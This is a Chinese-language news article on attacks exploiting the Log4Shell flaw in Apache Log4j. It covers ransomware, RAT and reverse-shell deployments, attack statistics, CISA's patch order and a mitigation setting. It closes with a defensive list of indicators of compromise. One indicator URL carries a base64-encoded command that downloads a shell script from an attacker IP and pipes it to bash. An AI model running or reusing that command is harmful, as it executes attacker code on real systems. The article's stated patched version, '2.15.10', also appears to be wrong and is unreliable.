駭客利用 Apache Log4j 中的重大風險漏洞來植入勒索軟體、Web Shell 和後門, CISA下令聯邦機構在平安夜前完成修補受Log4Shell漏洞影響的系統

隨著 Log4j攻擊活動的增加,CrowdStrike週二表示,觀察到有一個伊朗國家級的駭客組織NEMESIS KITTEN正瞄準Log4Shell漏洞並部署到一個可以由伺服器觸發Log4j的類檔,另外Bitdefender 也表示,其研究人員已經觀察到攻擊者試圖利用該漏洞來分發名為Khonsari的新型勒索軟體。此攻擊涉及使用惡意 .NET 檔,該檔案一旦執行,就會列出易受攻擊系統上的所有硬碟,並對除C槽之外的所有硬碟進行加密,然而會在C槽中加密特定的檔案夾,包括文檔、視頻和下載。除了勒索軟體,Bitdefender還觀察到攻擊者試圖在企業網路的易受攻擊系統上部署一種名為 Orcus 的已知遠端存取木馬(RAT)。Bitdefender進一步說,攻擊者使用這種技術在系統中站穩腳跟,在這些易受攻擊的伺服器上部署反向Bash shell相對簡單,並且很可能在未來進行更全面的攻擊。

因Log4j中的漏洞被攻擊的設備種類–Photo Credit: Armis

與此同時,物聯網安全供應商 Armis 發現目標設備(上圖)的種類涵蓋各種設備,攻擊活動針對伺服器佔 42%,虛擬機佔 27%,連接互聯網的攝像機佔 12%。Armis 還發現了針對 HMI 面板和控制器等製造設備以及考勤系統的攻擊企圖。

Check Point的研究,試圖利用該漏洞的攻擊數量持續上升,從 12 月 11 日的 40,000 次攻擊到 12 月 13 日的超過 800,000 次攻擊,用於利用該漏洞的變種數量也增加到60個。對於攻擊者來說,該漏洞提供了一個幾乎前所未有的機會,可以嘗試攻擊和破壞全球數十億台設備。Akamai 是跟踪攻擊活動的幾家供應商之一,週二表示,它已經觀察到多個變體試圖以每小時250,000個漏洞利用請求的持續攻擊量來利用該漏洞。Akamai 表示,迄今為止,超過 50% 的攻擊來自已知的威脅行為者,並且新的漏洞利用變體的發展速度是前所未有

由於攻擊的數量加上漏洞的嚴重性,促使美國國土安全部的網路安全和基礎設施局(CISA)發出多次警告,並下令所有聯邦機構在 12 月 24 日之前完成修補漏洞。Log4j的2.15.10版本中的修補程式解決了常見漏洞和披露資料庫中已知的 CVE-2021-44228 漏洞。CISA 指出 ,要修補使用受影響版本的 Log4j 的產品和服務中的漏洞,這些產品和服務的維護人員必須實施此安全更新。該機構敦促供應商立即識別、緩解和修補受Log4j影響的產品,將包含該漏洞的產品告知最終用戶,並強烈敦促他們優先考慮軟體更新。據了解,如果無法更新,在 Log4j 配置中將log4j2.formatMsgNoLookups 選項設置為true也可以防止漏洞利用。

另外,如果您想查看資安供應商的產品是否仍然是易受攻擊,或使用易受攻擊版本的Log4j,或已完成修補,可參考以下連結:

https://www.techsolvency.com/story-so-far/cve-2021-44228-log4j-log4shell/

有關Log4j漏洞的Indicators of Compromise (IOCs):

Hostname:

vyvdsvh.x.i.yunzhanghu.co

lnc7vvhztmjdfm221sdp76xnze5atz.burpcollaborator.net

jjug8i.xaliyun.com

e86eafcf9294.bingsearchlib.com

4568-3409-8076-3389.service.exfil.site

3be6466b6a20.bingsearchlib.com

0384eb5a.probe001.log4j.leakix.net

SHA 256:

fe98548300025a46de1e06b94252af601a215b985dad31353596af3c1813efb0

e20806791aeae93ec120e728f892a8850f624ce2052205ddb3f104bbbfae7f80

c38f0f809a1d8c50aafc2f13185df1441345f83f6eb4ef9c48270b9bd90c6799

c38c21120d8c17688f9aeb2af5bdafb6b75e1d2673b025b720e50232f888808a

c154d739cab62e958944bb4ac5ebad6e965a0442a3f1c1d99d56137e3efa8e40

b55ddbaee7abf1c73570d6543dd108df0580b08f730de299579570c23b3078c0

a3f72a73e146834b43dab8833e0a9cfee6d08843a4c23fdf425295e53517afce

8933820cf2769f6e7f1a711e188f551c3d5d3843c52167a34ab8d6eabb0a63ef

776c341504769aa67af7efc5acc66c338dab5684a8579134d3f23165c7abcc00

6a8965a0f897539cc06fefe65d1a4c5fa450d002d1a9d5d69d2b48f697ee5c05

63d43e5b292b806e857470e53412310ad7103432ba3390ecd4f74e432530a8a9

6370939d4ff51b934b7a2674ee7307ed06111ab3b896a8847d16107558f58e5b

3f6120ca0ff7cf6389ce392d4018a5e40b131a083b071187bf54c900e2edad26

19370ef36f43904a57a667839727c09c50d5e94df43b9cfb3183ba766c4eae3d

0e574fd30e806fe4298b3cbccb8d1089454f42f52892f87554325cb352646049

IPv4:

80.71.158.12

45.137.155.55

109.237.96.124

URL: http://80.71.158.12:5557/Basic/Command/Base64/KGN1cmwgLXMgODAuNzEuMTU4LjEyL2xoLnNofHx3Z2V0IC1xIC1PLSA4MC43MS4xNTguMTIvbGguc2gpfGJhc2g=

MD5:

648effa354b3cbaad87b45f48d59c616

6cead82e17c2dacbb83998cfe3841704

550f9f929bcb99aeaa3821779d8dea62

40e3b969906c1a3315e821a8461216bb

3dfbe75871e218d08328a01c56e1bb42

1db40b7e18cf228169d2f5d73bf27ef7

1348a00488a5b3097681b6463321d84c